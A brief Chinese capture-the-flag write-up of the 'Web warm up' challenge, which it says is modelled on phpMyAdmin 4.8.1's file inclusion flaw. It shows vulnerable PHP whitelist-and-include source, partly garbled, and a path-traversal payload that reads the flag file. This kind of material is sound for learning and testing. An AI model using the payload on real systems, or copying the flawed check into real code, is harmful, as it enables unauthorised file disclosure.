資訊專欄INFORMATION COLUMN
摘要:這個題目原型是的任意文件包含漏洞發(fā)現(xiàn)源碼不為空是字符串上面定義的方法返回值為真
[toc]
Web warm up這個題目原型是phpmyadmin4.8.1的任意文件包含漏洞
發(fā)現(xiàn)源碼
"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can"t see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . "?", "?")
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . "?", "?")
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can"t see it";
return false;
}
}
if (! empty($_REQUEST["file"]) 不為空
&& is_string($_REQUEST["file"]) 是字符串
&& emmm::checkFile($_REQUEST["file"]) 上面定義的checkfile方法返回值為真
) {
include $_REQUEST["file"];
exit;
} else {
echo "
";
}
?>
payloadhint.php?/../../../../../ffffllllaaaagggg
